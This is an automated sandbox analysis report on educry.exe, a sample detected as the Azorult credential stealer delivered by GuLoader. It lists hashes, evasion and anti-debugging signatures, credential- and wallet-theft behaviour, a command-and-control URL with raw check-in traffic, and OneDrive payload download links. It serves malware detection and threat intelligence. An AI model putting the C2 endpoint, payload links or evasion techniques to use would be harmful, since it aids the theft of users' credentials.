Analysis Report educry.exe

Overview

General Information

Sample Name: educry.exe
Analysis ID: 288088
MD5: ff8d576d2a44ebd419da4cd03cd49ba6
SHA1: 31de103753c826ed42883ab98daeeff443f12926
SHA256: 3ec257ac5b1594efa6862e7dfa6d4a4ed56f81ffb9e5320ce9dc95baaf9f00e1
Tags: exe

Detection

Azorult GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • educry.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\educry.exe' MD5: FF8D576D2A44EBD419DA4CD03CD49BA6)
    • educry.exe (PID: 6624 cmdline: 'C:\Users\user\Desktop\educry.exe' MD5: FF8D576D2A44EBD419DA4CD03CD49BA6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.260334364.000000001E06C000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: educry.exe PID: 6624 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: educry.exe PID: 6624 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
Process Memory Space: educry.exe PID: 6624 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: laninesolution.com | Virustotal: Detection: 12%
Source: http://laninesolution.com/roky/PL341/index.php | Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: educry.exe | Virustotal: Detection: 40%
Source: educry.exe | ReversingLabs: Detection: 22%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.5:49719 -> 202.52.146.102:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.102:80 -> 192.168.2.5:49719
Source: Joe Sandbox View | ASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID GMEDIA-AS-IDGlobalMediaTeknologiPTID
Source: global traffic | HTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 107 | Cache-Control: no-cache | Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 eb 26 66 9f 42 70 9d 3a 70 9d 30 14 8b 30 61 8b 30 60 8b 31 11 8b 30 60 8b 30 60 8b 30 65 8b 30 66 ef 47 13 8b 30 6c | Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE1&fBp:p00a0`10`0`0e0fG0l
Source: global traffic | HTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 40221 | Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: laninesolution.com | Content-Length: 107 | Cache-Control: no-cache | Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 eb 26 66 9f 42 70 9d 3a 70 9d 30 14 8b 30 61 8b 30 60 8b 31 11 8b 30 60 8b 30 60 8b 30 65 8b 30 66 ef 47 13 8b 30 6c | Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE1&fBp:p00a0`10`0`0e0fG0l
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp, educry.exe, 00000001.00000003.262199742.000000001E060000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php
Source: educry.exe, 00000001.00000003.254217702.0000000000882000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php)5
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php5
Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php=N
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.phpQ
Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.phpbN
Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.phpiHN
Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.phpp4
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://www.mozilla.com0
Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmp | String found in binary or memory: https://hqaoiw.bl.file
Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmp | String found in binary or memory: https://hqaoiw.bl.files.1drv.com/
Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp | String found in binary or memory: https://hqaoiw.bl.files.1drv.com/y4mYNBLkSGzFZRmGjrvFEg-nE1CZVR1rqz1N-OXSwX5km0DqN3zeaW9CloQuosMtR3q
Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: educry.exe, 00000001.00000003.254217702.0000000000882000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21164&authkey=ALVVLt1
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A020C EnumWindows,NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,0_2_023A020C
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A384E NtProtectVirtualMemory,0_2_023A384E
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3BB5 NtResumeThread,0_2_023A3BB5
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A15AC NtWriteVirtualMemory,0_2_023A15AC
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3C2C NtResumeThread,0_2_023A3C2C
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3822 NtProtectVirtualMemory,0_2_023A3822
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A0612 NtWriteVirtualMemory,0_2_023A0612
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A185A NtWriteVirtualMemory,0_2_023A185A
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A025E NtSetInformationThread,TerminateProcess,0_2_023A025E
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A02BD NtSetInformationThread,TerminateProcess,0_2_023A02BD
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A168D NtWriteVirtualMemory,0_2_023A168D
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3C81 NtResumeThread,0_2_023A3C81
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A16F0 NtWriteVirtualMemory,0_2_023A16F0
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3D95 NtResumeThread,0_2_023A3D95
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_023A3BDD NtResumeThread,0_2_023A3BDD
Source: C:\Users\user\Desktop\educry.exe | Code function: 0_2_004013E4 0_2_004013E4
Source: educry.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.dr | Static PE information: No import functions for PE file found
Source: educry.exe, 00000000.00000002.198187126.00000000021C0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs educry.exe
Source: educry.exe, 00000000.00000000.180158436.000000000040B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs educry.exe
Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs educry.exe
Source: educry.exe, 00000001.00000003.244888910.000000001EA50000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs educry.exe
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs educry.exe
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs educry.exe
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs educry.exe
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs educry.exe
Source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs educry.exe
Source: educry.exe, 00000001.00000002.267026698.000000001DEE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs educry.exe
Source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs educry.exe
Source: educry.exe, 00000001.00000000.196866223.000000000040B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
Source: educry.exe, 00000001.00000002.266989373.000000001DD90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs educry.exe
Source: educry.exe | Binary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
Source: C:\Users\user\Desktop\educry.exe | Section loaded: crtdll.dll
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
Source: C:\Users\user\Desktop\educry.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-E1A93A45-5503ADF9
Source: C:\Users\user\Desktop\educry.exe | File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\
Source: educry.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\educry.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\educry.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\educry.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: educry.exe | Virustotal: Detection: 40%
Source: educry.exe | ReversingLabs: Detection: 22%
Source: unknown | Process created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe'
Source: C:\Users\user\Desktop\educry.exe | Process created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe'
Source: C:\Users\user\Desktop\educry.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: educry.exe, 00000001.00000003.250420215.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: educry.exe, 00000001.00000003.245040275.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr
Source: Binary string: ucrtbase.pdb source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: educry.exe, 00000001.00000003.249906228.000000001F3FC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: educry.exe, 00000001.00000003.244768131.000000001EA44000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: educry.exe, 00000001.00000003.245040275.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: educry.exe, 00000001.00000003.244494995.000000001EA44000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: educry.exe, 00000001.00000003.244018876.000000001EA34000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: educry.exe, 00000001.00000003.249669828.000000001F3BC000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: educry.exe, 00000001.00000003.250454038.000000001F468000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: educry.exe, 00000001.00000003.244039958.000000001EA44000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: educry.exe, 00000001.00000003.250545208.000000001F4A8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: educry.exe, 00000001.00000003.244888910.000000001EA50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: educry.exe, 00000001.00000003.244281666.000000001EA3C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
